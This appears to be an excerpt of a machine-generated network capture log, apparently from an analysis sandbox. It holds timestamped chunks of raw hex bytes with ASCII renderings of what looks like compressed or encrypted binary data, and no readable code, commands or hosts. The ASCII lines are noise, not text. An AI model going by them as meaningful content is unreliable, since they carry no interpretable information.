                                                                                                                                                                                2021-11-11 11:26:04 UTC351INData Raw: 68 80 5b 2d 07 f5 c8 38 08 81 2b 0f 29 d0 6b 17 48 d4 4a ee ce 07 27 b8 e5 dc 93 0f e1 01 3e f5 61 6f 2c af 21 fa 01 4b ff 8d 4f 4d 62 6f a6 d9 04 09 fa 21 08 f8 7e cb f2 d1 ea 8b 09 d6 55 30 06 c8 a1 34 7d 32 34 99 3b 2a 57 7e bf dc e1 c7 4b 26 a2 35 92 aa 39 12 15 45 af d2 05 67 d5 1a 2e 75 cc e2 5e d2 a6 0f 7e 84 d6 84 66 2a ea 86 16 50 f6 58 31 5a da dc 2e 0f 95 7e f3 e4 17 bd f5 c9 10 ce 25 ec 22 09 60 67 97 74 c5 11 01 2e f9 a8 be 0e 6c c7 d3 44 e3 29 fa ea b6 e8 13 b8 01 77 a3 04 08 23 24 84 22 0b 2b 5e da 64 ea be 30 dd 3e 21 f0 ae f0 c4 a0 e9 04 be 29 2a 2b c7 55 89 f9 21 62 0d 40 54 83 c8 a1 2f fc b5 e9 90 68 33 3e 96 d0 6d 30 7b f1 8b 4a 03 21 b9 2d 88 e3 3d e9 51 9f a7 74 3c 2d 11 aa 3e 3a ec 35 d8 92 f3 1c e1 14 ee 34 4b 14 b7 cd 4f b8 44 b0
                                                                                                                                                                                Data Ascii: h[-8+)kHJ'>ao,!KOMbo!~U04}24;*W~K&59Eg.u^~f*PX1Z.~%"`gt.lD)w#$"+^d0>!)*+U!b@T/h3>m0{J!-=Qt<->:54KOD
                                                                                                                                                                                2021-11-11 11:26:04 UTC367INData Raw: ba ba 57 b4 aa 68 d5 09 17 d1 89 df 9c 8e 29 66 da 6a 03 60 9f 96 e9 97 fd a4 cd c6 bb ec b7 a4 bb a9 ac 9c a5 f5 b0 fa c9 28 bf 14 03 b5 e1 71 eb 2e a6 0e 4a fb 53 3c f7 92 22 1c 9f f0 f3 4a fe c1 e6 ea 24 26 1e 2c ee 5e c5 3b 8b 00 03 32 ae 5b 8c 49 4f 32 d8 76 f7 9e ce 6b 0e e7 49 de fe c2 62 66 29 81 ec fe be 0a 7a 65 4c fa 4b 4f 24 9c d0 be fd 65 ce ed 9d 8b f8 e6 2e cf de 09 17 ba 98 6d 01 f5 6b 99 1d 7b c4 ba be 74 18 ab dc 8d 40 97 9a f4 5d d9 4f 93 de eb ce 7d 63 1c 23 37 a2 df ce 0e 28 c3 47 65 bd ca 19 65 21 02 01 e9 39 30 d5 c5 44 ac c9 a1 a0 af 83 19 dc c8 5f ba a8 40 e2 ce 46 f1 be 25 0a 38 19 d9 92 ee ee 38 fb f6 5f 1c 29 2b 9c b4 bb 2f 94 ea f7 68 ee c5 31 d3 d9 8e e3 d4 aa 62 e9 cb d7 53 fe a8 02 9b 1d 2f d0 23 5a cf ef 28 a7 01 f7 3e eb
                                                                                                                                                                                Data Ascii: Wh)fj`(q.JS<"J$&,^;2[IO2vkIbf)zeLKO$e.mk{t@]O}c#7(Gee!90D_@F%88_)+/h1bS/#Z(>
                                                                                                                                                                                2021-11-11 11:26:04 UTC383INData Raw: 5a 09 b6 d4 16 25 64 8d 05 06 21 f1 e3 80 4f ae 20 d3 27 52 8a 71 60 2d 35 1c 38 1c 21 c7 25 31 fe 5f 47 59 10 71 42 c0 26 89 99 11 01 4e 00 75 ea 97 9b 21 25 94 57 22 b8 b7 d4 4d 5a 75 f6 45 58 66 29 b7 50 c2 e4 df 2f 09 fe b2 37 75 66 59 4e db ec bf b1 31 de 2e bb 32 4c fe f5 31 77 c7 36 84 50 8e 01 bf ba 0c f7 51 e2 bf af f1 d7 16 6d 97 54 f5 52 77 98 dd 03 06 b6 f2 52 55 ea e9 77 32 e1 c9 9d fe 7f a2 49 85 c3 33 f2 9f 85 f6 1f b2 2d 97 ba 12 ce 8b 9d 11 c1 1f 5a c2 57 0a fe 48 5a f5 d9 75 12 db 99 ef 6b 25 b9 bc 3e 4f e2 cd 55 fa 2e 38 c3 47 a1 70 d2 3f 34 2d 0b f6 06 f3 fe 17 d6 e2 1c 2d f6 f5 94 6d 9f 7b 38 85 01 ca ba 98 d8 1b 7a 29 9d 9a 7f d4 15 17 b0 bf 1e 2f f1 17 09 ff 6a a7 f0 12 c1 47 a7 6e 4a c4 29 b6 7b 2f e7 d9 66 62 29 f0 77 b0 47 e9 09
                                                                                                                                                                                Data Ascii: Z%d!O 'Rq`-58!%1_GYqB&Nu!%W"MZuEXf)P/7ufYN1.2L1w6PQmTRwRUw2I3-ZWHZuk%>OU.8Gp?4--m{8z)/jGnJ){/fb)wG
                                                                                                                                                                                2021-11-11 11:26:04 UTC399INData Raw: ef 29 c6 5f ce 64 94 d0 60 21 23 a3 fb 13 25 39 1e 9d 66 3c db d0 20 13 01 31 fe 8a 7c 05 86 ab c1 2b b8 59 b4 8a fd 4b 1e 52 92 04 f2 3e 93 ba 25 26 d0 67 37 31 cf 4d 9c 1a 7c 05 dd 3c ce 5b 05 af 8a bb 13 2b 30 ae e2 f3 5b ef 74 a4 bb 9d 75 a7 32 5f 46 1a 9c 06 c2 09 37 d7 79 be 48 43 25 f5 4e 02 5b 17 e1 21 6b 78 5b 01 4e 37 ef ce 30 65 2e 8b e6 f8 4a 98 2b 08 fc 27 0a 45 16 32 01 5a c2 2b 0f 94 d2 fc 0e 93 0f 8b 09 08 71 c8 68 2b af 5d 9a ee 61 e5 0a f1 fe 3e ab 74 0a 56 6d b0 8f fb 2d 89 f1 d7 29 f0 71 8e 27 56 62 12 cb ee ca ad 7c 59 ee b2 89 09 0b 7c 58 7b 2c 7c 18 67 24 6b 68 d8 27 a5 cb f8 ea b3 fc 5e 34 12 c0 d3 c8 31 d3 5b 35 22 e4 ef ce 2e c9 46 f0 d2 9b b5 d1 b0 41 66 39 0f f9 c6 2f fd b6 d4 cb 05 31 d1 09 c3 fd 48 4f fa 29 af 21 3f f9 f6 2f
                                                                                                                                                                                Data Ascii: )_d`!#%9f< 1|+YKR>%&g71M|<[+0[tu2_F7yHC%N[!kx[N70e.J+'E2Z+qh+]a>tVm-)q'Vb|Y|X{,|g$kh'^41[5".FAf9/1HO)!?/
                                                                                                                                                                                2021-11-11 11:26:04 UTC415INData Raw: 01 c2 9f 7c c3 eb 16 aa 24 03 1a d7 14 25 be d2 bc 21 2d b8 55 14 11 93 c3 2f 64 b4 2f 2b 1e 7c dc 6b 77 85 ed ee 62 cc 05 f7 e5 53 ad 5f 96 af 86 de 52 2d d9 15 21 1e ce 12 e2 1f e8 1a a4 bf a3 f5 0b ee 09 d8 5b 36 17 df fb 63 3f ee d2 f1 79 0c 09 09 d2 5d 46 98 5a e9 f3 dc 5e 8c c2 01 5d 1e 94 96 bb 8d 7f 2b dc 9a e9 4a 80 a2 48 84 89 de 85 6b dd dd 01 de 31 db 76 db 4e ba 30 2a 09 31 d2 9d fb 7e 12 cb ee f2 cc 92 64 46 14 d8 33 b4 b3 84 4b ed fc 79 bd 7e 08 73 f2 c2 75 e6 a7 3d 03 33 07 d9 21 c1 09 cb 77 4e 5e 9d ec e3 b1 c3 92 31 fb f2 cf d7 ab cd 8a 6e a2 71 85 c1 33 fd e1 99 2b db 2e 8d e9 7b f9 1b 58 a0 c4 01 c3 cd b3 dd c7 6e b7 92 06 a6 14 e0 71 fe bf 96 b9 95 76 b1 61 09 f2 bb 2f ec 87 b4 eb 32 e0 d3 f0 e6 40 21 23 88 29 f3 b7 f1 49 ad d4 32 80
                                                                                                                                                                                Data Ascii: |$%!-U/d/+|kwbS_R-![6c?y]FZ^]+JHk1vN0*1~dF3Ky~su=3!wN^1nq3+.{Xnqva/2@!#)I2
                                                                                                                                                                                2021-11-11 11:26:04 UTC431INData Raw: 16 f6 c5 41 d1 e1 80 68 e8 a5 be d4 77 ff a7 3b 5a 8d 41 2f 80 19 f0 05 1c b7 94 c1 49 25 11 8a 17 e2 2f 73 95 a5 de 89 58 2b 17 9d 52 23 b7 7e 8b d0 33 16 d6 14 ec 8b 2d ef 16 32 9d 55 14 c6 12 01 16 25 74 8d 91 23 0d 28 22 9e d6 ff 6c 4e 26 0e 83 49 bb 14 c9 e7 5f 45 3c 2d f1 86 8d 31 db 4e 2e fe 0a e1 26 59 ca 4c 2f 72 0e 0b 1b 0f 86 0b 51 83 43 f2 20 93 38 f4 a2 44 13 21 f3 f3 04 16 09 f7 a8 ef b5 e3 42 2d 16 c5 78 27 38 30 06 a6 13 db 65 47 16 7a a2 96 84 c1 80 53 ea 77 3b db dd 45 ee 92 ef ee f2 91 92 ba 72 f9 89 f3 20 17 05 ed 02 9a c5 77 85 03 ca ac 28 4a a3 35 92 ff 30 8f c9 29 d9 96 5e 69 fd 29 9c ff 33 3a d4 a8 73 d4 70 d2 e8 9d 59 c6 5b ec 81 b4 b8 a9 ce 89 c5 29 31 a3 ab 5d af 5e ae 2d c2 bd 88 af f9 ee 54 0d 4f 3d 1c 21 20 1c a0 ca eb 38 e9
                                                                                                                                                                                Data Ascii: Ahw;ZA/I%/sX+R#~3-2U%t#("lN&I_E<-1N.&YL/rQC 8D!B-x'80eGzSw;Er w(J50)^i)3:spY[)1]^-TO=! 8
                                                                                                                                                                                2021-11-11 11:26:04 UTC447INData Raw: 98 da 16 2d 54 24 4e 29 98 a9 7a eb 94 34 52 79 89 0f 21 c8 6a 16 6c 45 f6 d8 62 29 4a db ca bf 7a bd f9 23 89 33 17 56 4b 52 75 67 87 2f 46 04 69 29 38 f4 b8 22 67 b5 58 81 89 07 fb 7e f7 40 05 f3 dd ad 1d d9 c1 7b 8c f5 e8 9b 63 09 09 ff 7f ce 63 5a d5 be 3c 80 f2 f0 9e 27 6b 6e d6 20 25 59 16 2c 0b 79 be e4 0d 6e 5f 5a fc 8d a2 31 ff 53 a3 92 16 bf b2 2f b2 ee b0 7d bd 64 3e 1d 2c 2d cf 7e 85 58 ea bb 97 d3 ba a7 7e dc eb 30 2f 01 f3 a2 b8 ff 8b 46 59 77 bc a6 ff 80 61 29 f3 b8 66 2d 4f b3 fb 16 32 2d ca 6c 51 79 32 f6 c5 e9 35 be e2 1d 8b c1 f5 96 9c f5 20 d4 f8 d2 da fa f3 19 4e 64 ca fb b3 20 4e f3 77 4e 27 5f d4 f0 ef 17 c4 85 c2 dd ca 0c 9d 29 63 d0 72 31 c8 b2 cf 7b 1c 17 d1 cc 2d 21 5f db 8d 45 6f c1 35 32 0d 2f d8 56 ef b7 91 ce c3 e8 ca 21 5e
                                                                                                                                                                                Data Ascii: -T$N)z4Ry!jlEb)Jz#3VKRug/Fi)8"gX~@{ccZ<'kn %Y,yn_Z1S/}d>,-~X~0/FYwa)f-O2-lQy25 Nd NwN'_)cr1{-!_Eo52/V!^
                                                                                                                                                                                2021-11-11 11:26:04 UTC463INData Raw: 75 a4 84 cf c4 11 ee e8 30 a5 bd c6 9a cc f9 a1 a5 f6 f9 2f 54 f6 52 75 b9 4c 1a e1 36 ec 4f 41 4b 32 af ca 9f cf ea c8 c2 65 22 44 20 ce 80 25 f3 83 27 e9 5d 45 1d 29 ec 49 d7 e4 09 4a ff aa ce 90 4a ab d8 e6 29 5e c1 b6 c9 12 33 b9 fe b2 de 84 21 c7 85 6b e7 e6 17 bb 01 b2 96 93 ba 30 e5 33 32 21 55 f9 48 2a c1 c9 cf 1c 28 03 e7 85 fb eb e3 da 40 15 03 53 31 0d 24 28 c1 d0 f2 ba 9d d4 24 eb 1a 67 df 44 67 9d 09 64 7b ef ad 78 38 2d c7 3b e5 a4 90 ea 9f 01 07 f7 9e d6 7e 97 51 f2 ba cb 0e 4b c8 ee 37 f0 f1 5c 1c 9a a5 fb 13 51 2d 37 73 99 04 ea 31 ff 25 8c ad c2 4a 22 e7 3a 27 21 7c 3f 27 1b 1e 95 f8 9c a4 81 e4 05 87 63 87 4e af c2 30 8a c3 88 4e 3f ff 98 cf 35 0b 02 21 43 14 5c f7 13 07 53 b5 b7 83 2f bb f5 94 87 9d 7b 44 0a c3 01 74 e8 f3 25 94 5e 84
                                                                                                                                                                                Data Ascii: u0/TRuL6OAK2e"D %']E)IJJ)^3!k032!UH*(@S1$($gDgd{x8-;~QK7\Q-7s1%J":'!|?'cN0N?5!C\S/{Dt%^
                                                                                                                                                                                2021-11-11 11:26:04 UTC479INData Raw: 09 69 0b c8 f4 b9 17 ef be cb 4d 5a aa 29 a8 3a f6 cf 92 ac 3a a5 17 b4 af 64 61 ab 13 3c eb 62 01 0e 89 19 7e 10 35 48 ba 6d d8 63 e2 61 52 1e 29 10 7e ec 3b a4 bf a6 3b 93 f4 36 18 95 5b 7e a6 12 c9 d4 07 e2 03 19 75 f4 e9 6c 48 31 5b c8 fd 8e 8b 1a 94 68 2f 21 1e 65 39 01 32 71 1a 7b 19 2e e8 45 b2 0e 75 30 44 eb 6b 1a fe b3 14 dc 54 61 51 ee 7b f9 84 8c 3e 16 66 c5 5c fa 78 29 ac 04 c7 aa ed 25 8b 16 75 e4 89 9f ab 8e f7 67 28 8b 31 d0 6a ab de 49 66 3b 5e 2d 39 fe d7 99 8f 07 09 d9 cf 3e ac 70 a5 98 78 f7 c5 21 80 b0 b1 e5 3b ff 29 f2 28 74 cb cf 75 96 fb 8a ad fd b1 f7 30 20 13 df 9f 57 b2 fc 46 9e 7b 21 ff 3e bf 17 66 53 20 bb 68 a5 14 9c 51 52 df a5 cc 02 a7 bd 41 b7 6a a6 68 13 f3 28 b2 f4 94 32 26 f7 4c e9 65 40 25 9a 9f 2e 0c c9 20 e5 9a 2d 7c
                                                                                                                                                                                Data Ascii: iMZ)::da<b~5HmcaR)~;;6[~ulH1[h/!e92q{.Eu0DkTaQ{>f\x)%ug(1jIf;^-9>px!;)(tu0 WF{!>fS hQRAjh(2&Le@%. -|
                                                                                                                                                                                2021-11-11 11:26:04 UTC491INData Raw: 5a 3c ab b3 c6 ec 8a 96 79 bf fb 0f 09 c3 28 f9 c5 6d 28 2a 74 61 ea a6 ed 1a 21 3a 08 d5 94 ef 58 eb 0c cf c0 c0 32 dd d9 c9 5c 32 09 db 30 2d d4 9d 69 e4 7c 4a ce aa 09 3c ba f7 18 46 09 fb 94 2d 50 31 3e b3 68 24 11 25 d5 ec c2 25 21 d6 57 ec 22 94 76 61 12 89 d6 76 6f 5b a0 f6 bd 5b bb ab 64 53 f3 02 25 47 51 38 bf 5b fd 40 d2 f8 7f 4b 9d 60 64 05 53 bd cc c7 9b b7 3a 2f ea f5 b2 9e 75 de de 52 c2 1a 12 3c 7d 63 75 40 ce c9 f9 24 88 ca ad c9 76 1d 21 27 27 44 37 44 09 66 9f 57 87 ee 5e 09 6e 49 b7 7c 23 70 c6 80 b3 7b 09 f6 40 4c 45 96 89 6b c1 33 d6 f9 c6 6e 34 69 bb 5f 17 e7 7c f3 52 dd 93 a9 92 de 90 0a ff 32 94 f1 cf d3 98 d4 ee b7 16 ba 97 64 cf b5 d9 df c9 5c 79 c5 d6 ef 8d 42 3a f3 7a 88 ee 43 31 f6 33 ea 89 08 07 5b 94 cb 95 4b 04 1d c3 08 e8
                                                                                                                                                                                Data Ascii: Z<y(m(*ta!:X2\20-i|J<F-P1>h$%%!W"vavo[[dS%GQ8[@K`dS:/uR<}cu@$v!''D7DfW^nI|#p{@LEk3n4i_|R2d\yB:zC13[K
                                                                                                                                                                                2021-11-11 11:26:04 UTC507INData Raw: cc 8c 25 b3 21 0b 6a 94 b5 98 35 a0 8d 05 26 b1 ca c5 f2 8d 86 28 68 9c 16 18 17 66 b9 99 de 17 d7 f3 e2 2f b9 77 96 02 b7 74 c0 50 f7 28 b7 94 08 2f bf 0a c5 66 09 05 a1 f1 52 45 c9 d8 61 0c 84 4b e9 bb 28 4a 31 5d cf 9f 89 8b fe a0 c8 ea 27 fb bd 16 e9 d8 51 cf 43 28 69 08 7f ee e2 a2 fd fc 87 52 d4 8a 65 21 80 56 d2 2b 33 b7 d3 35 82 69 c5 85 62 6c d6 98 8d bf c5 53 13 d3 8d de 3c 2b 4a a7 ff 4d f6 8b 31 76 31 c5 cf ba b7 91 13 29 db b1 fc 18 be 89 5b df 8d a4 00 a4 01 f0 29 f5 7b cd 9a 7a f1 e6 97 a8 ea af ca 6f 2d ba 51 3f 69 d7 51 9f af 66 39 9d 06 bf cf 22 95 65 ab 2d fe 72 c1 fa 8b 01 68 b4 dd d3 f7 ff 31 23 29 f2 7f 8f e4 4f 8b b1 52 5a 41 3e 6b ad ca a2 1e 75 4c cc b7 c6 5b 84 d9 2d 03 1a cc 26 2c 2b 18 99 50 31 1f b5 e5 f3 1c ac d3 40 af 9d a3
                                                                                                                                                                                Data Ascii: %!j5&(hf/wtP(/fREaK(J1]'QC(iRe!V+35iblS<+JM1v1)[){zo-Q?iQf9"e-rh1#)ORZA>kuL[-&,+P1@
                                                                                                                                                                                2021-11-11 11:26:04 UTC523INData Raw: 89 06 d5 d3 55 15 25 9b 88 01 89 c1 e0 d5 79 1c a7 d5 62 cb 65 79 89 29 c7 e6 f5 98 5a 2f b8 01 14 6b bd 45 32 16 01 8c 66 f0 b6 86 25 79 ad 44 25 aa 29 b6 6a 8c fb 8b 4c 19 54 4f 8c c3 f0 2f 01 c6 55 9c bc 18 0d b6 2a 15 e9 4d bd fa 19 17 8c 30 fe ec 45 00 37 01 cc a0 0b d5 fa 12 c8 9b 85 0e cf 4a 06 a8 e1 08 01 8f 47 f4 ff fb 66 cc d1 27 c0 f1 6c 63 5b 50 cf 0b 81 07 1e b8 6b 0f 9f a2 49 a7 db 14 30 46 bf b6 13 00 78 97 8b fc 56 8c b2 e7 35 3a de ba be a1 e0 21 36 2b fd 58 92 32 07 ca c6 d3 4c 36 c3 4b be 63 3a 0e ca eb d7 ce 85 4b 80 72 3e 01 5f ce 31 42 ef 16 2b 0e 29 bd d9 f3 7a bc 8c a6 28 9f c0 63 f3 80 95 14 c1 9d 18 e4 09 0e b4 ac 6b d6 47 1e ef 93 f2 ab 39 2f 33 c4 60 b1 27 33 43 78 68 5a 34 73 62 c6 26 57 96 ef 82 4b 55 e3 f3 bc a9 c9 8a e2 4f
                                                                                                                                                                                Data Ascii: U%ybey)Z/kE2f%yD%)jLTO/U*M0E7JGf'lc[PkI0FxV5:!6+X2L6Kc:Kr>_1B+)z(ckG9/3`'3CxhZ4sb&WKUO
                                                                                                                                                                                2021-11-11 11:26:04 UTC539INData Raw: 5c 00 f3 cc ae e7 dc 48 25 05 c2 53 68 1e 29 d2 fe 5f d1 00 41 f3 8b 13 2f ec 37 e2 02 84 08 1f ba f7 c0 20 1e 1b e9 be 9b fc a8 40 08 2d c6 8c 09 e6 cf f7 f0 85 20 cc 0a 56 21 3b 27 e0 27 ff 1c 31 5a 0b d9 7c 1d f3 5c 02 03 56 18 11 12 21 19 29 04 c0 8e 77 2f fb 6b 5d b2 97 e1 06 01 7f dc 01 08 12 c3 8e 69 fe dc 72 01 b7 59 c9 25 77 1e 4e 70 09 e1 12 3b ba c7 c4 89 a6 aa 42 3a 89 38 77 6c 8a 97 f4 6c e2 31 39 7d fb c9 25 f6 5e 4b d7 67 41 0c df e7 0a f2 27 ab 90 74 c2 af 5d 91 4a ba 5e 6f 25 07 ee 82 25 ff 32 5d 62 b4 57 d6 ff e5 1b 69 f7 a7 a3 df 1c 98 2c 03 31 08 02 57 13 dd 74 57 7b f2 09 09 32 34 6c 4b 03 fb 79 cb e1 1a 22 7e 92 c0 08 e0 d0 45 75 f9 7e c6 00 dd d8 ac 7a 8d 6e 7f 67 0c 06 18 07 49 34 f9 03 53 ae f6 b2 22 b8 81 74 c0 d4 01 1d 30 1c e6
                                                                                                                                                                                Data Ascii: \H%Sh)_A/7 @- V!;''1Z|\V!)w/k]irY%wNp;B:8wll19}%^KgA't]J^o%%2]bWi,1WtW{24lKy"~Eu~zngI4S"t0
                                                                                                                                                                                2021-11-11 11:26:04 UTC555INData Raw: 58 be 4c e4 63 c6 ea 4d 84 1b 2a 12 d9 c2 06 1a 29 f7 af 3f a6 89 19 06 55 32 2b 6e e5 c3 3b bc 0d a2 c6 de b5 59 e6 3a ec 49 a2 25 df 1a 3f 5c c0 20 83 4a fe ae ce 1d 4d 2f d7 f7 76 69 5c fd 9e 2b bf 49 3f 02 6b 29 d2 32 30 0b eb 29 d7 32 14 0b c9 93 bc da 0b 62 87 51 5f 33 31 c1 d0 59 2f 5c 9d 79 11 27 d7 14 2f c9 2c f6 fb be 26 38 62 21 d8 ca 35 c2 7c 7d 31 26 c8 61 2b 04 d0 b9 34 c5 31 f0 97 ad 4b 29 82 45 fa 1d c1 6d 19 2a e8 45 e1 ab 32 84 10 c1 0f 4a c0 d0 d7 77 f3 01 c4 1e 14 1f 11 fb 97 c0 8c 28 f1 c0 67 85 e0 e7 07 f5 86 d8 20 12 01 4a 22 61 cc 28 63 1c b5 98 43 06 fe 71 18 50 01 94 09 0a 1d 1f f6 ff 70 b9 a2 0e 2d 0e 6a 1a 04 28 2c fa 8c 46 b2 27 e8 0b 71 92 1c 3c 13 c6 43 30 4f a2 08 19 12 b0 54 1e 5f 41 09 55 cd 8f fe 59 e9 c0 ba bb e0 5e 9e
                                                                                                                                                                                Data Ascii: XLcM*)?U2+n;Y:I%?\ JM/vi\+I?k)20)2bQ_31Y/\y'/,&8b!5|}1&a+41K)Em*E2Jw(g J"a(cCqPp-j(,F'q<C0OT_AUY^
                                                                                                                                                                                2021-11-11 11:26:04 UTC571INData Raw: 7f 32 b9 40 61 09 de e4 fe 38 9d d3 09 9c 21 c6 30 87 01 d6 b5 31 b2 cf 7d 2d 97 89 d9 b4 48 e4 ab b8 a4 a4 e3 d2 17 8b 07 e9 bc cf 29 12 67 df ab fd 32 b8 54 35 79 24 36 6d cb 3b 71 b1 62 f6 1f 55 b4 30 b5 8b a5 45 e0 24 27 23 f5 2d 58 76 97 16 3b 4f 41 8e 95 4b a9 b3 df 6b d1 27 fe 89 25 75 96 e6 86 d9 bd 78 e7 f0 21 55 f6 28 2e 52 5b 35 4d fc c5 7c d2 ee fc 64 b4 fa e3 2c 8f 89 93 cc ca d0 9d 61 f4 d1 3f 0b 8d ee 55 46 6f 25 ea 05 f7 4d ee 3f f0 e1 08 29 4f d0 fd 58 89 c2 7f d1 be 4b 62 f5 8b 2d d7 9c 28 4b e1 fe 28 f3 21 18 c3 33 37 f4 c0 98 a0 8c 01 cb 2c 2d 20 79 7b fa 37 75 99 4b d8 7b 29 62 8f 16 01 f2 eb f1 ec bd 4a 32 35 c6 e9 40 5f b7 f8 12 21 cf ff 34 71 bb ac e9 d6 17 a9 b3 12 5f 82 57 ef dc 96 72 60 cb ff e6 b5 2e a6 8a df bb c3 31 f3 5e 18
                                                                                                                                                                                Data Ascii: 2@a8!01}-H)g2T5y$6m;qbU0E$'#-Xv;OAKk'%ux!U(.R[5M|d,a?UFo%M?)OXKb-(K(!37,- y{7uK{)bJ25@_!4q_Wr`.1^
                                                                                                                                                                                2021-11-11 11:26:04 UTC587INData Raw: 4f 3a c2 48 2c 60 30 b1 07 40 75 f7 f2 e1 21 3d 21 ba c4 bc 14 00 56 3f 53 2f b9 d1 28 35 00 c0 06 c1 a5 f5 5f e4 50 00 57 ec ef 80 73 62 58 22 00 e2 8e 59 5b e8 60 9a 39 00 d2 93 be 16 0d 9b 94 2d 00 ba 7e c6 5a d5 a2 4c 8c 77 f8 00 c8 c1 65 82 f0 32 e4 6a 00 e5 7c 3d a2 8e 8d 19 7a 00 3e 42 ea 12 b3 a7 44 fb 00 76 b4 de 4e 5c b8 b5 fa 4c 6f 90 30 f8 be 78 bc aa 27 21 38 7f 40 e6 4f 55 b5 72 f7 13 13 8d ba 97 bd 00 d9 60 e9 72 38 79 1a 75 18 e7 4d 17 0a 46 2a 40 2b 34 27 53 30 d4 d8 4d 02 7e f6 b6 8b 07 45 21 ba 84 f8 95 8f 3f ea 8b 11 04 e6 a8 9d 25 af c9 9b 3b bf 7c 69 13 e1 c2 30 ff 30 97 e3 35 84 0b be 5d e5 46 16 cf 98 06 ef bf f9 79 64 31 b3 02 3b 29 df 08 b8 36 26 fb 31 10 09 df 66 44 4a f1 2a 6d 02 5b ef 38 33 09 58 f7 81 b1 c7 24 6c 60 a4 80 34
                                                                                                                                                                                Data Ascii: O:H,`0@u!=!V?S/(5_PWsbX"Y[`9-~ZLwe2j|=z>BDvN\Lo0x'!8@OUr`r8yuMF*@+4'S0M~E!?%;|i005]Fyd1;)6&1fDJ*m[83X$l`4
                                                                                                                                                                                2021-11-11 11:26:04 UTC603INData Raw: 01 e8 fb 8e 08 81 18 3a f3 4f 2e 10 39 94 39 10 0e 0b 88 13 49 08 ee f4 bc 4f 42 b1 f7 68 56 eb 09 e9 7a e6 3f 14 de 35 97 83 20 0b bf 85 a8 6b b2 f7 77 6c 62 6b e9 a6 0b 07 09 81 ba 5e 79 4d 04 89 de 25 ec 69 d2 fd 48 89 ee fd 16 85 9d 01 95 fb 31 d7 69 b6 85 c2 08 a7 fb 5a c4 34 f3 1e 4b ff 9a 04 12 ef 20 8b 34 2f c7 7c 33 72 d6 6e cf a2 f0 15 13 75 1a 8b 42 b6 d3 a8 96 e3 ae 39 2e 6e cc dd 17 49 b8 cc 96 d8 ed e6 a2 4e df e9 b7 eb 73 44 85 01 d1 37 da 74 cf af c1 72 cb 20 6d 3b d6 e1 d1 2f e1 0d 3a 8a f3 25 05 7d 4e 74 53 8b 37 1f 21 d6 ea 19 45 02 3c 0c c1 8b 08 21 fe 2b f3 62 ce 27 09 5b 5d da 9d 70 97 1b 23 41 4a 0d 0a 20 94 5e 07 14 bf 6e 2d 55 1c 4e a9 b1 c2 66 4b 27 ac 22 1c bf 31 61 0f 25 34 57 a0 54 8c 1c 26 a0 0d 00 d7 2b 58 e9 9c 49 c4 28 6f
                                                                                                                                                                                Data Ascii: :O.99IOBhVz?5 kwlbk^yM%iH1iZ4K 4/|3rnuB9.nINsD7tr m;/:%}NtS7!E<!+b'[]p#AJ ^n-UNfK'"1a%4WT&+XI(o
                                                                                                                                                                                2021-11-11 11:26:04 UTC619INData Raw: 16 fe 16 25 ee 64 36 ee 12 9b b9 f7 d1 f1 93 b8 a1 25 be d6 c2 58 29 f7 4b 01 ea c1 d9 ce 1f 22 0b c1 01 ca 8b 32 2b 62 a9 e9 53 e4 16 c3 be cb 32 21 e3 27 fc a4 ef 12 f8 ab 5f bf 2d eb 4a 7a 27 0e db 77 09 01 08 7d 16 c1 09 a5 f5 1f 15 b3 1a dd 1b 9d 04 cc a7 1a 27 ba f3 5d 16 d0 ad ee 8a f2 72 25 02 4c c6 06 51 dd 49 71 78 a5 dc 11 e9 f5 43 ed cc be b7 b9 13 31 f7 fe 09 9b ef 5f 59 4b 6a 9b 6b 72 a5 5b ba cf 19 5b cd 16 4e d5 7b 4b 28 ca 1e 02 09 f8 2b 0f 0d 79 bd bb ab 1f 47 ab 12 0a 35 1c 52 ca f7 62 31 0f 54 a7 6b f5 ab 7a 7e 81 5a 5e 2a 49 b2 18 f1 3c 80 2f 6e 34 2e 14 31 65 da b2 05 62 28 26 d4 cc 51 09 7f a2 b2 20 a0 b5 5c af 52 d6 82 c0 e2 ee 9f 51 95 7b 44 12 ea ba dd 40 3a fb 17 4c bb 29 c1 2f b6 df 13 31 f6 ff d9 c4 7a b8 8b c4 ef 28 e8 03 a2
                                                                                                                                                                                Data Ascii: %d6%X)K"2+bS2!'_-Jz'w}']r%LQIqxC1_YKjkr[[N{K(+yG5Rb1Tkz~Z^*I</n4.1eb(&Q \RQ{D@:L)/1z(
                                                                                                                                                                                2021-11-11 11:26:04 UTC635INData Raw: 21 ca 3f aa ee 0d 9a 95 bd e6 f8 98 da 13 ef 86 58 8c 1c 21 df 58 09 89 da 8b e2 55 11 2b f9 ad 94 14 6f fe d2 95 5c cd 56 bd c6 f1 dc 64 85 fa ff 37 a8 6c d7 ba 82 f2 9c 5d 74 95 52 e4 2f 9e 68 e8 3f 4c ec 1a 9d 6e 1a 4a 18 e9 f4 d7 e5 f4 2f fb 2b 65 42 66 2f 0e 71 d1 c3 b0 95 d2 f6 a4 fe c9 d8 3f 21 f1 c2 d7 62 ca cc a8 4b ea 12 11 e0 f9 24 9e 20 50 8b 1b 9d ce 89 25 29 f0 77 10 a7 31 ff 9f e7 b0 2d 74 8e af 74 0c 51 09 10 31 f0 2d 5b 40 8a 41 2d 09 42 60 7d 7c 16 c9 89 12 de 42 27 d9 6e ac 66 1a d3 4a 45 16 27 5e 19 92 80 ac fa e4 85 a9 ff cb 38 4f af d8 2e 21 5c d7 e5 dd c5 d0 8b 19 02 0f 80 31 c0 dd d1 35 a4 1a 13 f8 8c 88 31 4e c7 ba 8a 09 0e 08 40 45 00 fe 1f 97 1b f8 14 7c 9a 29 37 03 f2 5e 65 09 44 91 25 58 32 19 0b ad d9 4a d6 5f 1f 10 5c 3f 01
                                                                                                                                                                                Data Ascii: !?X!XU+o\Vd7l]tR/h?LnJ/+eBf/q?!bK$ P%)w1-ttQ1-[@A-B`}|B'nfJE'^8O.!\151N@E|)7^eD%X2J_\?
